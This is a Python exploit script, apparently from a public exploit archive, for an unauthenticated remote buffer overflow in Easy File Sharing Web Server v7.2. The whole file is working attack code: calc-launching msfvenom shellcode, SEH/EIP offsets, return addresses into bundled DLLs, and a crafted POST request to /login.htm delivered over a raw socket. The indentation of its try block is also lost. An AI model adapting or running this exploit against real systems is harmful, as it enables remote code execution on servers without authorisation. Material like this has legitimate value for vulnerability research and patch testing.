Share
#!/usr/bin/python  
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow  
# Exploit Author: boku (aka Bobby Cooke)  
# Date: February 7th, 2020  
# Vendor Homepage: http://www.sharing-file.com/  
# Software Link: http://www.sharing-file.com/efssetup.exe  
# Version: 7.2  
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC  
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC  
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC  
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC  
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated,   
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed   
# POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create  
# an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the   
# socket directly.  
# Recreate:   
# 1) Download & install Easy File Sharing Web Server v7.2  
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443  
# 3) Change the 'host' variable below to the IP to the target devices IP  
# 4) Run this python script  
# 5) The program will crash and calculator will open  
import socket  
  
host = "192.168.70.134"  
port = 80  
  
nops = '\x90'*200  
# Bad char = \x00,\x3b  
# Expanding the buffer past 4028 bytes causes SEH to trigger  
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode  
# Payload size: 216 bytes  
shellcode = b""  
shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4"  
shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04"  
shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f"  
shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7"  
shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e"  
shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60"  
shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3"  
shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0"  
shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03"  
shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8"  
shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a"  
shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa"  
shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45"  
shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b"  
shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2"  
shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5"  
shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80"  
shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f"  
shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7"  
shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95"  
# + ECX & SEH offset @ 3996  
offsetECX = '\xcc'*(3996-len(nops+shellcode))  
CL = '\x42'  
CH = '\x3f'  
offsetEIP = '\x43'*8  
high2bECX = '\x42\x42'  
# EIP overwrite at offset 4008  
# - EBX holds PTR to payload in Heap  
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..  
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)   
ret1 = '\x19\x1e\x01\x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret  
# - After EIP overwrite ret, ESP is at +16 bytes  
offsetRet2 = '\x42'*12  
ret2 = '\x5b\x02\xc4\x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]  
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2  
  
httpRequest = "POST /login.htm HTTP/1.1\r\n"  
httpRequest += "Host: "+host+"\r\n"  
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"  
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"  
httpRequest += "Accept-Language: en-US,en;q=0.5\r\n"  
httpRequest += "Accept-Encoding: gzip, deflate\r\n"  
httpRequest += "Referer: http://"+host+"/register.ghp\r\n"  
httpRequest += "Content-Type: application/x-www-form-urlencoded\r\n"  
httpRequest += "Connection: close\r\n"  
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201\r\n"  
httpRequest += "Upgrade-Insecure-Requests: 1\r\n"  
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=&register=Register%21\r\n"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
connect = s.connect((host, port))  
print("[+] Successfully connected to "+host)  
s.send(httpRequest)  
print("[+] Payload Sent")  
except:  
print("Failure to launch")